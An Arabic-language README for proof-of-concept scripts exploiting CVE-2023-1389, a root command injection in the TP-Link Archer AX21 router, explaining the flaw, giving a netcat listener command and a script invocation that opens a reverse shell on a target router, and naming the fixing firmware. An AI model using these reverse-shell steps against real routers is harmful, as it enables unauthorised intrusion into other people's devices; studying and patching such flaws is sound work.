
نصوص برهان مفهوم لـ CVE-2023-1389، وهي ثغرة حقن أوامر غير مصادق عليها في أجهزة توجيه TP-Link Archer AX21. تتضمن استغلالات الصدفة العكسية ونقل الملفات عبر معامل country.
CVE-2023–1389 هي ثغرة حقن أوامر غير موثقة (Unauthenticated Command Injection) في جهاز التوجيه TP-Link Archer AX21 WiFi. يستخدم استدعاء (callback) في معامل country دالة popen()، والتي تعمل بصلاحيات الجذر (root)، مما يسمح للمهاجم بحقن قيم عشوائية من خلال طلبات GET أو POST إلى واجهة الإدارة، دون الحاجة إلى المصادقة. يمكن العثور على مزيد من التفاصيل حول الثغرة هنا.
هذه بعض إثباتات المفهوم (Proof-of-Concepts) التي أنشأتها أثناء استكشاف حقن الأوامر. كان Archer-file-transfer.py هو الإصدار الأول، وهو معقد إلى حد ما في كيفية تحقيق التفاعل. يمنحك Archer-rev-shell.py شيل عكسي بسيط باستخدام netcat، وهو على الأرجح ما تبحث عنه. إذا كنت ترغب في معرفة المزيد عن تطوير هذه السكريبتات، يمكنك قراءة المقال هنا.
في نافذة طرفية واحدة:
nc your_IP listener_port
في نافذة طرفية ثانية:
python3 archer-rev-shell.py -r router_IP -a your_IP -p listner_port
أصدرت TP-Link إصدار البرنامج الثابت (firmware) 1.1.4 Build 20230219 والذي يعالج المشكلة عن طريق إزالة الاستدعاء الضعيف. تحديث جهاز التوجيه إلى أحدث إصدار من البرنامج الثابت يجب أن يحمي جهازك.
من المحتمل ألا أحافظ على هذه الإثباتات (PoCs). كلاهما بسيط للغاية ويجب أن يكون من السهل تعديلهما حسب الحاجة.